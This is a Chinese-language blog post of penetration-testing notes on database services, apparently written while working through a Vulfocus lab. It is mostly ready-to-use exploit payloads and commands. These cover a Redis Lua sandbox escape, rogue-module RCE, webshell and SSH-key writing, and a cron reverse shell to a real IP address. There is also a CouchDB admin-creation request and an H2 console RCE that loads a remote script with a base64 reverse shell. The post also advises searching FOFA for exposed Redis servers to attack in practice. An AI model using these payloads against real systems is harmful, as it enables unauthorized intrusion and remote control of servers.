

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/phone_icon/hacker.png">
  <link rel="icon" href="/img/browser_icon/hacker.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="0z-sIHN">
  <meta name="keywords" content="">
  
    <meta name="description" content="服务攻防​ ‍ ‍ 前置环境搭建 Vulfocus (官方在线的无法使用)  官方手册：https:&#x2F;&#x2F;fofapro.github.io&#x2F;vulfocus&#x2F;#&#x2F;  搭建参考：  vulfocus 靶机环境搭建部署：  https:&#x2F;&#x2F;blog.csdn.net&#x2F;csd_ct&#x2F;article&#x2F;details&#x2F;121158165   vulfocus 不能同步的解决方法">
<meta property="og:type" content="article">
<meta property="og:title" content="服务攻防">
<meta property="og:url" content="http://example.com/2024/09/05/%E6%9C%8D%E5%8A%A1%E6%94%BB%E9%98%B2/index.html">
<meta property="og:site_name" content="0z-sIHN 的博客">
<meta property="og:description" content="服务攻防​ ‍ ‍ 前置环境搭建 Vulfocus (官方在线的无法使用)  官方手册：https:&#x2F;&#x2F;fofapro.github.io&#x2F;vulfocus&#x2F;#&#x2F;  搭建参考：  vulfocus 靶机环境搭建部署：  https:&#x2F;&#x2F;blog.csdn.net&#x2F;csd_ct&#x2F;article&#x2F;details&#x2F;121158165   vulfocus 不能同步的解决方法">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/essay_cover_img/21.png">
<meta property="article:published_time" content="2024-09-05T06:00:00.000Z">
<meta property="article:modified_time" content="2024-11-10T14:46:43.226Z">
<meta property="article:author" content="0z-sIHN">
<meta property="article:tag" content="服务攻防">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/essay_cover_img/21.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>服务攻防 - 0z-sIHN 的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0z-sIHN Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>联系我</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/essay_top_cover_bg/office.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="服务攻防"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-05 14:00" pubdate>
          2024年9月5日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          15 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">服务攻防</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="服务攻防"><a href="#服务攻防" class="headerlink" title="服务攻防"></a>服务攻防</h1><p><img src="/assets/image-20240927205746-8oaupv2.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<p>‍</p>
<h1 id="前置环境搭建"><a href="#前置环境搭建" class="headerlink" title="前置环境搭建"></a>前置环境搭建</h1><ol>
<li><p>Vulfocus (官方在线的无法使用)</p>
</li>
<li><p>官方手册：<a target="_blank" rel="noopener" href="https://fofapro.github.io/vulfocus/#/">https://fofapro.github.io/vulfocus/#/</a></p>
</li>
<li><p>搭建参考：</p>
<ul>
<li><p>vulfocus 靶机环境搭建部署：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/csd_ct/article/details/121158165">https://blog.csdn.net/csd_ct&#x2F;article&#x2F;details&#x2F;121158165</a></li>
</ul>
</li>
<li><p>vulfocus 不能同步的解决方法 &#x2F;vulfocus 同步失败：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_64563956/article/details/131229046">https://blog.csdn.net/m0_64563956&#x2F;article&#x2F;details&#x2F;131229046</a></li>
</ul>
</li>
</ul>
</li>
<li><p>自己搭建：</p>
<ol>
<li><p>拉取镜像 (我用的是虚拟机 kali）</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">docker pull vulfocus/vulfocus:latest<br></code></pre></td></tr></table></figure></li>
<li><p>运行vulfocus</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">docker run -d -p <span class="hljs-number">80</span>:<span class="hljs-number">80</span> -v /<span class="hljs-keyword">var</span>/run/docker.sock:/<span class="hljs-keyword">var</span>/run/<br>docker.sock -e VUL_IP=<span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span> vulfocus/vulfocus<br></code></pre></td></tr></table></figure>

<ul>
<li>-d 后台运行</li>
<li>-v &#x2F;var&#x2F;run&#x2F;docker.sock:&#x2F;var&#x2F;run&#x2F;docker.sock 为 docker 交互连接。</li>
<li>-e DOCKER_URL 为 Docker 连接方式，默认通过 unix:&#x2F;&#x2F;var&#x2F;run&#x2F;docker.sock 进行连接，也可以通过 tcp:&#x2F;&#x2F;xxx.xxx.xxx.xxx:2375 进行连接（必须开放 2375 端口）。</li>
<li>-e VUL_IP=xxx.xxx.xxx.xxx 为 Docker 服务器 IP ，不能为 127.0.0.1。</li>
<li>默认账户密码为 admin&#x2F;admin</li>
</ul>
</li>
<li><p>直接访问 web 页面</p>
<p> <img src="/assets/image-20240927232604-l3f8iyl.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>镜像拉取太慢记得配置代理</p>
</li>
</ol>
</li>
</ol>
<p>‍</p>
<p>‍</p>
<h1 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h1><p>‍</p>
<h2 id="Redis"><a href="#Redis" class="headerlink" title="Redis"></a>Redis</h2><ul>
<li><p>默认端口：6379</p>
</li>
<li><p>Redis 是一套开源的使用 ANSI C 编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库，并提供多种语言的 API。Redis 如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。</p>
</li>
</ul>
<p>‍</p>
<h3 id="沙箱绕过-RCE-CVE-2022-0543"><a href="#沙箱绕过-RCE-CVE-2022-0543" class="headerlink" title="沙箱绕过 RCE-CVE-2022-0543"></a>沙箱绕过 RCE-CVE-2022-0543</h3><ol>
<li><p>启动靶场后有个映射端口 (注意这是数据库，不是网站，网站访问会报错，无法访问)，使用工具（Another Redis Desktop Manager）直接连接，发现可以连接成功</p>
<p> <img src="/assets/image-20240927233243-frs1sm9.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>在命令行执行 poc，这里是执行 id 命令</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">eval</span> <span class="hljs-string">&#x27;local io_l = package.loadlib(&quot;/usr/lib/x86_64-linux-gnu/liblua5.1.so.0&quot;, &quot;luaopen_io&quot;); local io = io_l(); local f = io.popen(&quot;id&quot;, &quot;r&quot;); local res = f:read(&quot;*a&quot;); f:close(); return res&#x27;</span> <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240927233420-32kuul5.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>命令执行成功，实战中也有，可以使用 fofa 直接搜 redis 服务并且 6379 端口，若数据包有返回内容，说明可以进行尝试，若数据包为错误返回，则没有</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">fofa搜索语法 port=<span class="hljs-string">&quot;6379&quot;</span> &amp;&amp; protocol=<span class="hljs-string">&quot;redis&quot;</span><br></code></pre></td></tr></table></figure>

<p> 若返回如下则无未授权访问</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">-ERR unknown command `help`, with args beginning with:<br>-NOAUTH Authentication required.<br></code></pre></td></tr></table></figure></li>
</ol>
<p>‍</p>
<p>‍</p>
<h3 id="未授权访问-CNVD-2019-21763"><a href="#未授权访问-CNVD-2019-21763" class="headerlink" title="未授权访问 - CNVD-2019-21763"></a>未授权访问 - CNVD-2019-21763</h3><ul>
<li><p>由于在 Reids 4.x 及以上版本中新增了模块功能，攻击者可通过外部拓展，在 Redis 中实现一个新的 Redis 命令。攻击者可以利用该功能引入模块，在未授权访问的情况下使被攻击服务器加载恶意.so 文件，从而实现远程代码执行。</p>
</li>
<li><p>利用工具项目：<a target="_blank" rel="noopener" href="https://github.com/vulhub/redis-rogue-getshell">https://github.com/vulhub/redis-rogue-getshell</a></p>
</li>
<li><p>利用：</p>
<ul>
<li><p>启动靶场，获得映射端口，然后利用工具执行命令</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">cd RedisModulesSDK/<br>make<br></code></pre></td></tr></table></figure>

<p>Then, exp.so is in <code>RedisModulesSDK/exp.so</code>​</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">python redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P <span class="hljs-number">8888</span> -f RedisModulesSDK/exp.so -c <span class="hljs-string">&quot;id&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="/assets/image-20240927234146-w4ucvn5.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>这里用的 kali 虚拟机搭建的靶场，然后也用的 kali 进行的攻击，所以目标 ip 和攻击 ip 是一样的</p>
</li>
</ul>
</li>
</ul>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h3 id="未授权访问：CNVD-2015-07557"><a href="#未授权访问：CNVD-2015-07557" class="headerlink" title="未授权访问：CNVD-2015-07557"></a>未授权访问：CNVD-2015-07557</h3><p>三种利用方式，都是利用写文件</p>
<h4 id="写-Webshell"><a href="#写-Webshell" class="headerlink" title="写 Webshell"></a>写 Webshell</h4><ul>
<li><p>利用条件：有 Web 网站，且 Web 目录权限可读写，需得到 Web 路径</p>
</li>
<li><p>利用：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">config set dir /tmp <span class="hljs-comment">#设置WEB写入目录</span><br>config set dbfilename <span class="hljs-number">1</span>.php <span class="hljs-comment">#设置写入文件名</span><br>set test <span class="hljs-string">&quot;&lt;?php phpinfo();?&gt;&quot;</span> <span class="hljs-comment">#设置写入文件代码</span><br>bgsave <span class="hljs-comment">#保存执行</span><br>save <span class="hljs-comment">#保存执行</span><br></code></pre></td></tr></table></figure></li>
</ul>
<h4 id="写定时任务反弹-shell"><a href="#写定时任务反弹-shell" class="headerlink" title="写定时任务反弹 shell"></a>写定时任务反弹 shell</h4><ul>
<li><p>利用条件：Redis 服务使用 ROOT 账号启动，安全模式 protected-mode 处于关闭状态</p>
</li>
<li><p>利用：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php">config set dir /<span class="hljs-keyword">var</span>/spool/cron<br>set yy <span class="hljs-string">&quot;\n\n\n* * * * * bash -i &gt;&amp; /dev/tcp/47.94.236.117/5555 0&gt;&amp;1\n\n\n&quot;</span><br>config set dbfilename x<br>save<br></code></pre></td></tr></table></figure>
</li>
<li><p>注意：</p>
<ul>
<li>centos 会忽略乱码去执行格式正确的任务计划，而 ubuntu 并不会忽略这些乱码，所以导致命令执行失败</li>
</ul>
</li>
</ul>
<h4 id="写入-Linux-ssh-key-公钥"><a href="#写入-Linux-ssh-key-公钥" class="headerlink" title="写入 Linux ssh-key 公钥"></a>写入 Linux ssh-key 公钥</h4><ul>
<li><p>利用条件：Redis 服务使用 ROOT 账号启动，安全模式 protected-mode 处于关闭状态，允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器</p>
</li>
<li><p>利用：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php">ssh-keygen -t rsa<br>cd /root/.ssh/<br>(<span class="hljs-keyword">echo</span> -e <span class="hljs-string">&quot;\n\n&quot;</span>; cat id_rsa.pub; <span class="hljs-keyword">echo</span> -e <span class="hljs-string">&quot;\n\n&quot;</span>) &gt; key.txt<br>cat key.txt | redis-cli -h 目标IP -x set xxx<br><span class="hljs-comment">//以上步骤在自己的攻击机器上执行</span><br>config set dir /root/.ssh/<br>config set dbfilename authorized_keys<br>save<br>cd /root/.ssh/<br>ssh -i id_rsa root@目标IP<br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="自动化项目"><a href="#自动化项目" class="headerlink" title="自动化项目"></a>自动化项目</h3><ul>
<li><p>项目 GitHub 地址：<a target="_blank" rel="noopener" href="https://github.com/n0b0dyCN/redis-rogue-server">https://github.com/n0b0dyCN/redis-rogue-server</a></p>
</li>
<li><p>小迪说实战中直接利用攻击测就 ok，一个一个测试太慢了</p>
</li>
<li><p>利用：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">python redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost IP<br></code></pre></td></tr></table></figure>

<p><img src="/assets/image-20240928113154-d1rrb8a.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<p>‍</p>
<p>‍</p>
<h2 id="Couch"><a href="#Couch" class="headerlink" title="Couch"></a>Couch</h2><ul>
<li>默认端口：5984</li>
<li>Apache CouchDB 是一个开源数据库，专注于易用性和成为 “完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式，JavaScript 作为查询语言，MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛，如 BBC 用在其动态内容展示平台，Credit Suisse 用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web 和应用程序）。在 2017 年 11 月 15 日，CVE-2017-12635 和 CVE-2017-12636 披露利用。</li>
</ul>
<p>‍</p>
<h3 id="命令执行-CVE-2017-12636"><a href="#命令执行-CVE-2017-12636" class="headerlink" title="命令执行 - CVE-2017-12636"></a>命令执行 - CVE-2017-12636</h3><ul>
<li>漏洞利用项目地址：<a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py">https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py</a></li>
</ul>
<h4 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h4><ol>
<li><p>下载上面的 exp.py</p>
</li>
<li><p>修改 exp.py 中的目标和反弹地址</p>
<p> <img src="/assets/image-20240928113711-oy894qs.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
<p>‍</p>
<p>‍</p>
<h3 id="垂直权限绕过（CVE-2017-12635）"><a href="#垂直权限绕过（CVE-2017-12635）" class="headerlink" title="垂直权限绕过（CVE-2017-12635）"></a>垂直权限绕过（CVE-2017-12635）</h3><ol>
<li><p>先创建用户，使用 bp 或者 postman 发 PUT 包创建即可，这里我用的是 postman</p>
<p> 数据包内容</p>
 <figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">PUT</span> <span class="hljs-string">/_users/org.couchdb.user:xiaodi</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>47.94.236.117:44389<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>*/*<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>en<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/json<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>108<br> <br><br><span class="language-prolog">&#123;</span><br><span class="language-prolog"><span class="hljs-string">&quot;type&quot;</span>: <span class="hljs-string">&quot;user&quot;</span>,</span><br><span class="language-prolog"><span class="hljs-string">&quot;name&quot;</span>: <span class="hljs-string">&quot;SuYou&quot;</span>,</span><br><span class="language-prolog"><span class="hljs-string">&quot;roles&quot;</span>: [<span class="hljs-string">&quot;_admin&quot;</span>],</span><br><span class="language-prolog"><span class="hljs-string">&quot;roles&quot;</span>: [],</span><br><span class="language-prolog"><span class="hljs-string">&quot;password&quot;</span>: <span class="hljs-string">&quot;suyou&quot;</span></span><br><span class="language-prolog">&#125;</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240928113952-n054rh4.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>登录用户授权，访问 <a href="http://xxx.xxx.xxx.xxx:xxx/\_utils/#login">http://xxx.xxx.xxx.xxx:xxx/\_utils/#login</a> 登录页面<br> 用户名密码 SuYou suyou<br> 成功登录到数据库</p>
<p> <img src="/assets/image-20240928114018-9hafnlc.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h2 id="H2database"><a href="#H2database" class="headerlink" title="H2database"></a>H2database</h2><ul>
<li><p>默认端口：20051</p>
</li>
<li><p>Java SQL 数据库 H2,H2 的主要特点是：非常快，开源，JDBC API；嵌入式和服务器模式；内存数据库；基于浏览器的控制台应用程序。H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞，在 v2.1.210 + 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。</p>
</li>
<li><p>H2database 标志界面</p>
<p><img src="/assets/image-20240928114115-psueiwt.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<h3 id="未授权访问-CVE-漏洞"><a href="#未授权访问-CVE-漏洞" class="headerlink" title="未授权访问 &amp; CVE 漏洞"></a>未授权访问 &amp; CVE 漏洞</h3><h4 id="未授权进入"><a href="#未授权进入" class="headerlink" title="未授权进入"></a>未授权进入</h4><p>直接在 JDBC URL 处填入以下内容即可无需用户密码进入数据库</p>
<figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vbnet"><span class="hljs-symbol">jdbc:</span>h2:mem:test1;FORBID_CREATION=<span class="hljs-literal">FALSE</span>;IGNORE_UNKNOWN_SETTINGS=<span class="hljs-literal">TRUE</span>;FORBID_CREATION=<span class="hljs-literal">FALSE</span>;\<br></code></pre></td></tr></table></figure>

<p>这里还可以使用 rmi 进行攻击尝试</p>
<p>‍</p>
<h4 id="RCE-执行反弹"><a href="#RCE-执行反弹" class="headerlink" title="RCE 执行反弹"></a>RCE 执行反弹</h4><ol>
<li><p>在自己服务器上创建数据库文件：h2database.sql，内容如下</p>
 <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">TABLE</span> test (<br>id <span class="hljs-type">INT</span> <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span><br>);<br><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">TRIGGER</span> TRIG_JS BEFORE <span class="hljs-keyword">INSERT</span> <span class="hljs-keyword">ON</span> TEST <span class="hljs-keyword">AS</span> <span class="hljs-string">&#x27;//javascript</span><br><span class="hljs-string">Java.type(&quot;java.lang.Runtime&quot;).getRuntime().exec(&quot;bash -c &#123;echo,base64加密的反弹shell指令&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;);&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p> 反弹指令示例</p>
 <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">bash <span class="hljs-operator">-</span>i <span class="hljs-operator">&gt;</span><span class="hljs-operator">&amp;</span> <span class="hljs-operator">/</span>dev<span class="hljs-operator">/</span>tcp<span class="hljs-operator">/</span>x.x.x.x<span class="hljs-operator">/</span><span class="hljs-number">6666</span> <span class="hljs-number">0</span><span class="hljs-operator">&gt;</span><span class="hljs-operator">&amp;</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure></li>
<li><p>在服务器上启动提供 SQL 文件远程加载服务，python，或者 apache 之类的都可以</p>
 <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">python3 <span class="hljs-operator">-</span>m http.server 端口<br></code></pre></td></tr></table></figure></li>
<li><p>在服务器上启动监听端口，这里上面反弹的是 6666. 所以监听 6666</p>
 <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">nc <span class="hljs-operator">-</span>lvvp <span class="hljs-number">6666</span><br></code></pre></td></tr></table></figure></li>
<li><p>在靶场访问的界面 JDBC URL 处填入 Payload 使其加载远程 SQL</p>
 <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">jdbc:h2:mem:test1;FORBID_CREATION<span class="hljs-operator">=</span><span class="hljs-literal">FALSE</span>;IGNORE_UNKNOWN_SETTINGS<span class="hljs-operator">=</span><span class="hljs-literal">TRUE</span>;FORBID_CREATION<span class="hljs-operator">=</span><span class="hljs-literal">FALSE</span>;INIT<span class="hljs-operator">=</span>RUNSCRIPT <span class="hljs-keyword">FROM</span> <span class="hljs-string">&#x27;http://搭建的IP:端口/h2database.sql&#x27;</span>;\<br></code></pre></td></tr></table></figure></li>
</ol>
<p>‍</p>
<p>‍</p>
<p>以下均为常见CVE复现，依靠前期的信息搜集再用POC去打</p>
<h1 id="中间件"><a href="#中间件" class="headerlink" title="中间件"></a>中间件</h1><p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="框架"><a href="#框架" class="headerlink" title="框架"></a>框架</h1><p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="组件"><a href="#组件" class="headerlink" title="组件"></a>组件</h1><p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="端口协议"><a href="#端口协议" class="headerlink" title="端口协议"></a>端口协议</h1><p>‍</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%9C%8D%E5%8A%A1%E6%94%BB%E9%98%B2/" class="category-chain-item">服务攻防</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%9C%8D%E5%8A%A1%E6%94%BB%E9%98%B2/" class="print-no-link">#服务攻防</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>服务攻防</div>
      <div>http://example.com/2024/09/05/服务攻防/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>0z-sIHN</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
